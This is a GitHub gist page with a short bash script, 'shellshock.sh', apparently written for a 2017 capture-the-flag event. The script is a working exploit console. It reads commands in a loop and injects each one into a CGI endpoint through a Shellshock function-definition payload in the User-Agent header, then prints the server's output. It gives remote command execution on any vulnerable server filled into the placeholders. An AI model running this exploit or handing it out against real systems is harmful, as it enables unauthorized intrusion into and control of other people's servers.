Skip to content

Instantly share code, notes, and snippets.

@ronaldstoner
Created June 30, 2017 19:34
Show Gist options
  • Save ronaldstoner/6d88198439c1327ffaf513a5a165b6c9 to your computer and use it in GitHub Desktop.
Save ronaldstoner/6d88198439c1327ffaf513a5a165b6c9 to your computer and use it in GitHub Desktop.
shellshock.sh
#!/bin/bash
#
# Shellshock Console
# Created by rstoner (Ron Stoner)
# for Hackmethod 2017 CTF challenges
#
# Replace {webserver} and {scriptname} with targets
which curl &>/dev/null
if [[ $? -ne 0 ]]; then
echo "[!] curl needs to be installed to run this script"
exit 1
fi
# Execute commands
while :; do
printf "[shellshock>] "
read cmd
curl -s -A "() { test;};echo \"Content-type: text/plain\"; echo; echo;${cmd}" -O http://{webserver}:8080/cgi-bin/{scriptname}
cat {scriptname}
echo ""
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment